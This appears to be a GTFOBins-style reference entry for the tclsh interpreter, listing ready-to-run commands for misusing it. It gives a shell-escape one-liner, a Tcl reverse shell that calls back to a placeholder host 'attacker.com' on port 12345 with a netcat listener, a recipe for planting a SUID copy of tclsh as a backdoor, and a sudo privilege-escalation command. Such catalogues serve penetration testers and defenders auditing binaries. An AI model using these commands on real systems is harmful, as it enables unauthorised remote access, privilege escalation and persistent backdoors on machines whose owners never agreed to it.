It can be used to break out from restricted environments by spawning an interactive system shell.
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderrIt can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
Run nc -l -p 12345 on the attacker box to receive the shell.
export RHOST=attacker.com
export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclshIt runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run sh -p, omit the -p argument on systems
like Debian that allow the default sh shell to run with SUID privileges.
sudo sh -c 'cp $(which tclsh) .; chmod +s ./tclsh'
./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderrIt runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo.
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr